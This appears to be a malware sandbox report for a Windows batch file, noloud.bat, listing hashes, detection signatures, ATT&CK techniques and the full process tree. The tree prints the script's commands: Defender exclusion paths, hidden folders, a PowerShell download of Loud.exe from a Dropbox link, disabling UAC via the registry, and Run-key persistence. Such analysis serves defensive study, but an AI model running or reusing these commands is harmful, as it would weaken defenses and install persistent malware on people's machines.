a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-11-2024 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

noloud.bat
Size

12KB
MD5

e435591eabd5596e754a7acaede7dca7
SHA1

2b1b728aae5d3e72fe4bc864559d0347489f995a
SHA256

a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d
SHA512

3248a7cf8542068c126906b9db5e3fb0dde7ca123b7cf3f5375aad6b5c65bb909db5e3b5e127104e664b57eea4774d5283228533f01beb45b50ccdd3545e8f69
SSDEEP

384:gTYcpQyuPmhDGEhtKCR2XYmE2JdAp6EbW263JM3jXMIccK:gTYcpQyuPmhDGEhtKCReU2JdjES3JQj4

Score

10^/10

evasion execution persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2784	powershell.exe
2588	powershell.exe
2852	powershell.exe
472	powershell.exe
2720	powershell.exe
2612	powershell.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe"	reg.exe

Modifies registry key 1 TTPs 7 IoCs

Modify Registry

T1112

pid	Process
1472	reg.exe
1944	reg.exe
316	reg.exe
1656	reg.exe
1176	reg.exe
2520	reg.exe
1088	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2852	powershell.exe
472	powershell.exe
2784	powershell.exe
2588	powershell.exe
2720	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	472	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 2412	2916	cmd.exe	31
PID 2916 wrote to memory of 2412	2916	cmd.exe	31
PID 2916 wrote to memory of 2412	2916	cmd.exe	31
PID 2412 wrote to memory of 2136	2412	net.exe	32
PID 2412 wrote to memory of 2136	2412	net.exe	32
PID 2412 wrote to memory of 2136	2412	net.exe	32
PID 2916 wrote to memory of 2852	2916	cmd.exe	33
PID 2916 wrote to memory of 2852	2916	cmd.exe	33
PID 2916 wrote to memory of 2852	2916	cmd.exe	33
PID 2916 wrote to memory of 472	2916	cmd.exe	34
PID 2916 wrote to memory of 472	2916	cmd.exe	34
PID 2916 wrote to memory of 472	2916	cmd.exe	34
PID 2916 wrote to memory of 2784	2916	cmd.exe	35
PID 2916 wrote to memory of 2784	2916	cmd.exe	35
PID 2916 wrote to memory of 2784	2916	cmd.exe	35
PID 2916 wrote to memory of 2588	2916	cmd.exe	36
PID 2916 wrote to memory of 2588	2916	cmd.exe	36
PID 2916 wrote to memory of 2588	2916	cmd.exe	36
PID 2916 wrote to memory of 636	2916	cmd.exe	37
PID 2916 wrote to memory of 636	2916	cmd.exe	37
PID 2916 wrote to memory of 636	2916	cmd.exe	37
PID 2916 wrote to memory of 2720	2916	cmd.exe	38
PID 2916 wrote to memory of 2720	2916	cmd.exe	38
PID 2916 wrote to memory of 2720	2916	cmd.exe	38
PID 2916 wrote to memory of 2612	2916	cmd.exe	39
PID 2916 wrote to memory of 2612	2916	cmd.exe	39
PID 2916 wrote to memory of 2612	2916	cmd.exe	39
PID 2916 wrote to memory of 2520	2916	cmd.exe	40
PID 2916 wrote to memory of 2520	2916	cmd.exe	40
PID 2916 wrote to memory of 2520	2916	cmd.exe	40
PID 2916 wrote to memory of 1636	2916	cmd.exe	41
PID 2916 wrote to memory of 1636	2916	cmd.exe	41
PID 2916 wrote to memory of 1636	2916	cmd.exe	41
PID 2916 wrote to memory of 828	2916	cmd.exe	42
PID 2916 wrote to memory of 828	2916	cmd.exe	42
PID 2916 wrote to memory of 828	2916	cmd.exe	42
PID 2916 wrote to memory of 1088	2916	cmd.exe	43
PID 2916 wrote to memory of 1088	2916	cmd.exe	43
PID 2916 wrote to memory of 1088	2916	cmd.exe	43
PID 2916 wrote to memory of 1472	2916	cmd.exe	44
PID 2916 wrote to memory of 1472	2916	cmd.exe	44
PID 2916 wrote to memory of 1472	2916	cmd.exe	44
PID 2916 wrote to memory of 1944	2916	cmd.exe	45
PID 2916 wrote to memory of 1944	2916	cmd.exe	45
PID 2916 wrote to memory of 1944	2916	cmd.exe	45
PID 2916 wrote to memory of 316	2916	cmd.exe	46
PID 2916 wrote to memory of 316	2916	cmd.exe	46
PID 2916 wrote to memory of 316	2916	cmd.exe	46
PID 2916 wrote to memory of 1656	2916	cmd.exe	47
PID 2916 wrote to memory of 1656	2916	cmd.exe	47
PID 2916 wrote to memory of 1656	2916	cmd.exe	47
PID 2916 wrote to memory of 1176	2916	cmd.exe	48
PID 2916 wrote to memory of 1176	2916	cmd.exe	48
PID 2916 wrote to memory of 1176	2916	cmd.exe	48

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1636	attrib.exe
828	attrib.exe
636	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\noloud.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\system32\attrib.exe
  attrib +h "PP2" /s/d
  2⤵
  - Views/modifies file attributes
  PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-WebrequestWindows_NT 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\system32\reg.exe
  reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:2520
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:1636
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:828
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1088
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1472
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1944
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:316
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1656
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
83369889cf04a914fa87cb95e619d4e0

SHA1
7663edb02c4b39f9062c56b80a28ba7915b29d86

SHA256
2d2c7edce098b6b511322871a34e1ec7813ad06191473a9d4b3b98ab18624b75

SHA512
5cae49df35f702c2693db0a32a7fbe5d9382f22f97214672cb709cf866aad453f3e25d3347fb86ba7b12438366f4a37d71ec8ce95405c8d68084f37e22c5ec56

Download Submit
memory/472-17-0x000000001B490000-0x000000001B772000-memory.dmp

Filesize
2.9MB

Download
memory/472-18-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2852-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

Filesize
4KB

Download
memory/2852-5-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2852-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2852-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-10-0x0000000002B4B000-0x0000000002BB2000-memory.dmp

Filesize
412KB

Download
memory/2852-9-0x0000000002B44000-0x0000000002B47000-memory.dmp

Filesize
12KB

Download